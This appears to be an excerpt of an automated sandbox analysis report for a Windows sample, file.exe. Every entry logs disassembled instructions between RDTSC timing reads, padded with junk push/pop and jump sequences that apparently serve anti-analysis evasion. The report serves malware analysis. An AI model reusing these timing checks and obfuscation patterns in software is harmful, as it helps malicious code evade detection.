Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80549 second address: 4C80565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C75307h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80565 second address: 4C80575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bh, 99h 0x0000000d push esi 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80575 second address: 4C8058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75302h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60626 second address: 4C6062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6062A second address: 4C60645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60645 second address: 4C6066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, E9h 0x00000005 mov ah, F5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF624B4E7E5h 0x00000013 pop esi 0x00000014 mov dx, ACC4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6066E second address: 4C606AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FF624C752FEh 0x00000012 movzx ecx, di 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 movzx ecx, dx 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF624C752FEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606AC second address: 4C606B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606B2 second address: 4C606B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80008 second address: 4C8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8000C second address: 4C80023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80023 second address: 4C80053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FF624B4E7DAh 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624B4E7E0h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80053 second address: 4C80062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80062 second address: 4C8007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8007A second address: 4C80096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a call 00007FF624C752FDh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C802C0 second address: 4C802D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0673 second address: 4CA0679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0679 second address: 4CA06FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624B4E7E4h 0x00000013 adc ecx, 7D0E5B08h 0x00000019 jmp 00007FF624B4E7DBh 0x0000001e popfd 0x0000001f mov bh, al 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, 7D77h 0x00000028 jmp 00007FF624B4E7DCh 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FF624B4E7E0h 0x00000034 mov ebp, esp 0x00000036 jmp 00007FF624B4E7E0h 0x0000003b xchg eax, ecx 0x0000003c pushad 0x0000003d mov si, D99Dh 0x00000041 mov cx, 7299h 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA06FE second address: 4CA070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA070E second address: 4CA07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF624B4E7E4h 0x00000011 sub ecx, 3D890488h 0x00000017 jmp 00007FF624B4E7DBh 0x0000001c popfd 0x0000001d mov edx, eax 0x0000001f popad 0x00000020 mov eax, dword ptr [76FB65FCh] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF624B4E7E0h 0x0000002c or ch, FFFFFFE8h 0x0000002f jmp 00007FF624B4E7DBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FF624B4E7E8h 0x0000003b sbb cl, 00000048h 0x0000003e jmp 00007FF624B4E7DBh 0x00000043 popfd 0x00000044 popad 0x00000045 test eax, eax 0x00000047 jmp 00007FF624B4E7E6h 0x0000004c je 00007FF696DE198Ch 0x00000052 pushad 0x00000053 push ecx 0x00000054 mov di, D7C0h 0x00000058 pop edi 0x00000059 push ecx 0x0000005a push ebx 0x0000005b pop eax 0x0000005c pop edi 0x0000005d popad 0x0000005e mov ecx, eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA087E second address: 4CA08A8 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 mov edx, 0729C2C4h 0x0000000d pop edi 0x0000000e popad 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FF628F95B8Dh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FF624C75304h 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08A8 second address: 4CA08E7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, A6B6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624B4E7E7h 0x0000000d mov dx, cx 0x00000010 pop eax 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c mov di, cx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08E7 second address: 4CA08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08F5 second address: 4CA08FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08FB second address: 4CA0901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50099 second address: 4C500A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C500A8 second address: 4C5010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1C67AC0Ah 0x00000008 pushfd 0x00000009 jmp 00007FF624C752FBh 0x0000000e or eax, 5FC492AEh 0x00000014 jmp 00007FF624C75309h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and esp, FFFFFFF8h 0x00000020 jmp 00007FF624C752FEh 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF624C75307h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5010A second address: 4C5010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5010F second address: 4C50166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9E88h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C752FEh 0x00000011 xchg eax, ecx 0x00000012 jmp 00007FF624C75300h 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov di, cx 0x0000001c mov dh, al 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FF624C75304h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF624C752FAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50166 second address: 4C5016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5016A second address: 4C50170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50170 second address: 4C50221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov dx, D9BCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007FF624B4E7DBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushad 0x00000018 call 00007FF624B4E7E2h 0x0000001d pop esi 0x0000001e mov ch, bh 0x00000020 popad 0x00000021 push eax 0x00000022 mov al, dh 0x00000024 pop esi 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FF624B4E7E0h 0x0000002e sbb ax, 6A68h 0x00000033 jmp 00007FF624B4E7DBh 0x00000038 popfd 0x00000039 call 00007FF624B4E7E8h 0x0000003e pushfd 0x0000003f jmp 00007FF624B4E7E2h 0x00000044 adc esi, 760667F8h 0x0000004a jmp 00007FF624B4E7DBh 0x0000004f popfd 0x00000050 pop ecx 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF624B4E7E2h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50221 second address: 4C50233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50233 second address: 4C5025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5037A second address: 4C5037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5037E second address: 4C50384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50384 second address: 4C5038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5038A second address: 4C5038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5038E second address: 4C503CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FF624C75300h 0x00000013 test edx, 61000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503CB second address: 4C503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503CF second address: 4C503D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40787 second address: 4C4078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4078D second address: 4C40791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40791 second address: 4C407BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407BE second address: 4C407C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407C4 second address: 4C407C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407C8 second address: 4C407CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407CC second address: 4C40830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF624B4E7E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ch, CDh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FF624B4E7E5h 0x0000001a and esp, FFFFFFF8h 0x0000001d jmp 00007FF624B4E7DEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 movzx esi, dx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, ecx 0x00000030 mov dl, al 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov bl, cl 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40830 second address: 4C40854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40854 second address: 4C40858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40858 second address: 4C4085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4085E second address: 4C4089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 pushfd 0x00000006 jmp 00007FF624B4E7DDh 0x0000000b adc cx, F436h 0x00000010 jmp 00007FF624B4E7E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624B4E7DCh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4089A second address: 4C408C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C75305h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C408C1 second address: 4C40995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FF624B4E7DCh 0x00000012 mov ecx, 6C189271h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov ebx, 00000000h 0x00000022 jmp 00007FF624B4E7E4h 0x00000027 test esi, esi 0x00000029 pushad 0x0000002a movzx ecx, dx 0x0000002d call 00007FF624B4E7E3h 0x00000032 pushfd 0x00000033 jmp 00007FF624B4E7E8h 0x00000038 or cx, FC08h 0x0000003d jmp 00007FF624B4E7DBh 0x00000042 popfd 0x00000043 pop esi 0x00000044 popad 0x00000045 je 00007FF696E34215h 0x0000004b pushad 0x0000004c mov di, 7738h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushfd 0x0000005f jmp 00007FF624B4E7DBh 0x00000064 add ecx, 0AFAECFEh 0x0000006a jmp 00007FF624B4E7E9h 0x0000006f popfd 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40995 second address: 4C40A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF624C752FCh 0x00000012 adc eax, 21847328h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f mov ax, di 0x00000022 pop ebx 0x00000023 popad 0x00000024 je 00007FF696F5ACC7h 0x0000002a jmp 00007FF624C752FEh 0x0000002f test byte ptr [76FB6968h], 00000002h 0x00000036 pushad 0x00000037 mov ax, 485Dh 0x0000003b mov bx, ax 0x0000003e popad 0x0000003f jne 00007FF696F5ACB6h 0x00000045 jmp 00007FF624C75304h 0x0000004a mov edx, dword ptr [ebp+0Ch] 0x0000004d jmp 00007FF624C75300h 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 mov bh, ah 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FF624C75309h 0x0000005d or esi, 1EA724B6h 0x00000063 jmp 00007FF624C75301h 0x00000068 popfd 0x00000069 mov cx, 0AA7h 0x0000006d popad 0x0000006e popad 0x0000006f push eax 0x00000070 pushad 0x00000071 movsx ebx, si 0x00000074 mov edx, ecx 0x00000076 popad 0x00000077 xchg eax, ebx 0x00000078 jmp 00007FF624C752FEh 0x0000007d xchg eax, ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007FF624C75307h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40A91 second address: 4C40ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DFh 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40ABD second address: 4C40B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF624C752FEh 0x0000000f push dword ptr [ebp+14h] 0x00000012 jmp 00007FF624C75300h 0x00000017 push dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF624C752FAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B05 second address: 4C40B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B26 second address: 4C40B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007FF624C75306h 0x0000000d add esi, 62094E18h 0x00000013 jmp 00007FF624C752FBh 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B56 second address: 4C40B9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF624B4E7E8h 0x00000008 and ecx, 1545B878h 0x0000000e jmp 00007FF624B4E7DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF624B4E7E5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B9E second address: 4C40C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 98A2h 0x00000007 pushfd 0x00000008 jmp 00007FF624C75303h 0x0000000d sbb ah, FFFFFF9Eh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebx 0x0000001a jmp 00007FF624C752FEh 0x0000001f mov esp, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FF624C752FDh 0x0000002a sbb ax, 3E86h 0x0000002f jmp 00007FF624C75301h 0x00000034 popfd 0x00000035 mov ecx, 210AEC37h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DB3 second address: 4C50DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DB8 second address: 4C50DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DBE second address: 4C50DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DC2 second address: 4C50E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 9923h 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 pushfd 0x00000016 jmp 00007FF624C75302h 0x0000001b adc al, 00000068h 0x0000001e jmp 00007FF624C752FBh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E16 second address: 4C50E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E1C second address: 4C50E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75308h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E38 second address: 4C50E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E61 second address: 4C50E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50BE0 second address: 4C50BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
